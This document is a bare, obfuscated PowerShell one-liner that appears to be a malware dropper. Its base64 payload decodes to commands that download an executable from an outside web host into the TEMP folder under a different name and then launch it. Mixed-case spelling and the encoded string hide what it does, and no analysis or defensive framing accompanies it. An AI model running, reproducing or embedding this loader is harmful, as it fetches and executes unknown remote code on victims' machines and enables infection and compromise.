iex([system.text.eNcOding]::utF8.GetSTRInG([SYstEM.COnVert]::FroMbasE64StRINg('CihOZXctT2JqZWN0IFNZc3RFTS5uZXQuV0VCQ0xJRW50KS5kT1duTE9hZGZpbGUoJ2h0dHA6Ly9ib2lzZWRlbGFyaXZpZXJlLmNvbS9iYWNrdXAvY3NzL25ld2NvbmZpZy5leGUnLCIkRW5WOlRFTVBcbmVvbmU2LmV4ZSIpO1N0YXJ0LVByb2Nlc3MgKCIkRW5WOlRFTVBcbmVvbmU2LmV4ZSIpCgo=')));exit